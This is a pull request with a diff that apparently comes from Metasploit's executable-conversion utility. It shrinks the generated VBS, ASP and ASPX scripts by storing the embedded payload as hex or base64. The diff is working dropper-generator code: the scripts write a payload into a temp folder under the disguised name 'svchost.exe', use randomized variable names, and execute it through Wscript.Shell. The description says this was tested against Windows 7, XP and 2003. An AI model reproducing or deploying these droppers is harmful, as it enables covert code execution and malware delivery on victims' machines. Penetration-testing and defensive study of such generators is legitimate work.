### PR TITLE
Reduce size of VBS/ASP/ASP.NET Scripts

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -963,10 +963,11 @@ End Sub
 	end
 
 	def self.to_exe_asp(exes = '', opts={})
-		exe = exes.unpack('C*')
+		exe = exes.unpack("H*").join
 		vbs = "<%\r\n"
 
-		var_bytes   = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small
+		var_bytes   = Rex::Text.rand_text_alpha(rand(8)+8) 
+		var_byte    = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_fname   = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_func    = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_stream  = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -977,20 +978,7 @@ End Sub
 		var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)
 
 		vbs << "Sub #{var_func}()\r\n"
-
-		vbs << "#{var_bytes}=Chr(#{exe[0]})"
-
-		lines = []
-		1.upto(exe.length-1) do |byte|
-			if(byte % 100 == 0)
-				lines.push "\r\n#{var_bytes}=#{var_bytes}"
-			end
-			# exe is an Array of bytes, not a String, thanks to the unpack
-			# above, so the following line is not subject to the different
-			# treatments of String#[] between ruby 1.8 and 1.9
-			lines.push "&Chr(#{exe[byte]})"
-		end
-		vbs << lines.join("") + "\r\n"
+		vbs << "#{var_bytes}=\"#{exe}\"\r\n"
 
 		vbs << "Dim #{var_obj}\r\n"
 		vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
@@ -1004,7 +992,14 @@ End Sub
 		vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
 		vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
 		vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"
-		vbs << "#{var_stream}.Write #{var_bytes}\r\n"
+
+		vbs << "For x = 1 To Len(#{var_bytes})-3 Step 2\r\n"
+		vbs << "#{var_byte} = Chr(38) & \"H\" & Mid(#{var_bytes}, x, 2)\r\n"
+		vbs << "#{var_stream}.write Chr(#{var_byte})\r\n"
+		vbs << "Next\r\n"
+
+		vbs << "#{var_stream}.write Chr(#{var_byte})\r\n"
+
 		vbs << "#{var_stream}.Close\r\n"
 		vbs << "Dim #{var_shell}\r\n"
 		vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -911,7 +911,7 @@ End Sub
 		exe = exes.unpack("H*").join
 		vbs = ""
 
-		var_bytes   = Rex::Text.rand_text_alpha(rand(8)+8) 
+		var_bytes   = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_byte    = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_fname   = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_func    = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -966,7 +966,7 @@ End Sub
 		exe = exes.unpack("H*").join
 		vbs = "<%\r\n"
 
-		var_bytes   = Rex::Text.rand_text_alpha(rand(8)+8) 
+		var_bytes   = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_byte    = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_fname   = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_func    = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -1051,7 +1051,7 @@ End Sub
 		source << "\t\tFileStream #{var_fs} = File.Create(#{var_tempexe});\r\n"
 		source << "\t\ttry\r\n"
 		source << "\t\t{\r\n"
-		source << "\t\t\tbyte[] #{var_bytes} = Convert.FromBase64String(#{var_file}.ToString());\r\n" 
+		source << "\t\t\tbyte[] #{var_bytes} = Convert.FromBase64String(#{var_file}.ToString());\r\n"
 		source << "\t\t\t#{var_fs}.Write(#{var_bytes},0, #{var_bytes}.Length);\r\n"
 		source << "\t\t}\r\n"
 		source << "\t\tfinally\r\n"

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -921,6 +921,7 @@ End Sub
 		var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)
+		var_counter = Rex::Text.rand_text_alpha(rand(8)+8)
 
 		vbs << "Function #{var_func}()\r\n"
 		vbs << "#{var_bytes}=\"#{exe}\"\r\n"
@@ -931,18 +932,19 @@ End Sub
 		vbs << "Dim #{var_tempdir}\r\n"
 		vbs << "Dim #{var_tempexe}\r\n"
 		vbs << "Dim #{var_basedir}\r\n"
+		vbs << "Dim #{var_counter}\r\n"
 		vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"
 
 		vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"
 		vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
 		vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
 		vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe}, true , false)\r\n"
-
-		vbs << "For x = 1 To Len(#{var_bytes})-3 Step 2\r\n"
-		vbs << "#{var_byte} = Chr(38) & \"H\" & Mid(#{var_bytes}, x, 2)\r\n"
+		vbs << "#{var_counter} = 1\r\n"
+		vbs << "For #{var_counter} = 1 To Len(#{var_bytes})-3 Step 2\r\n"
+		vbs << "#{var_byte} = Chr(38) & \"H\" & Mid(#{var_bytes}, #{var_counter}, 2)\r\n"
 		vbs << "#{var_stream}.write Chr(#{var_byte})\r\n"
 		vbs << "Next\r\n"
-
+		vbs << "#{var_byte} = Chr(38) & \"H\" & Mid(#{var_bytes},#{var_counter})\r\n"
 		vbs << "#{var_stream}.write Chr(#{var_byte})\r\n"
 
 		vbs << "#{var_stream}.Close\r\n"
@@ -976,6 +978,7 @@ End Sub
 		var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8)
 		var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)
+		var_counter = Rex::Text.rand_text_alpha(rand(8)+8)
 
 		vbs << "Sub #{var_func}()\r\n"
 		vbs << "#{var_bytes}=\"#{exe}\"\r\n"
@@ -986,17 +989,20 @@ End Sub
 		vbs << "Dim #{var_tempdir}\r\n"
 		vbs << "Dim #{var_tempexe}\r\n"
 		vbs << "Dim #{var_basedir}\r\n"
+		vbs << "Dim #{var_counter}\r\n"
 		vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"
 
 		vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"
 		vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
 		vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
 		vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"
-		vbs << "For x = 1 To Len(#{var_bytes})-3 Step 2\r\n"
-		vbs << "#{var_byte} = Chr(38) & \"H\" & Mid(#{var_bytes}, x, 2)\r\n"
+		vbs << "#{var_counter} = 1\r\n"
+		vbs << "For #{var_counter} = 1 To Len(#{var_bytes})-3 Step 2\r\n"
+		vbs << "#{var_byte} = Chr(38) & \"H\" & Mid(#{var_bytes}, #{var_counter}, 2)\r\n"
 		vbs << "#{var_stream}.write Chr(#{var_byte})\r\n"
 		vbs << "Next\r\n"
 
+		vbs << "#{var_byte} = Chr(38) & \"H\" & Mid(#{var_bytes},#{var_counter})\r\n"
 		vbs << "#{var_stream}.write Chr(#{var_byte})\r\n"
 
 		vbs << "#{var_stream}.Close\r\n"


### PR DESCRIPTION
This pull request contains code to reduce the size of the vbs/aps/apsx scripts by adding a small decoder to the scripts.

Basically the change removes the additional "Chr()" and "&" code from the scripts, so instead of writing:

```
Chr(77)&Chr(90)&Chr(144)&Chr(0)...
```

its only:

```
"4d5a90...."
```

The ASPX code was changed to support base64 encoded payloads.

The following examples show the results when creating a vbs/asp/aspx script with windows/exec as payload to start  calc.exe:

Old:
vbs script: 596KB
asp script: 596 KB
aspx script: 289 KB

New:
vbs script: 145KB
asp script: 145KB
aspx script: 100KB

The VBS Script was tested against Windows 7/XP/2003
The ASP/ASPX Scripts were testen against Windows 2003/ASP.NET 1.1 and ASP.NET 2.0

If you have any questions, please let me know.
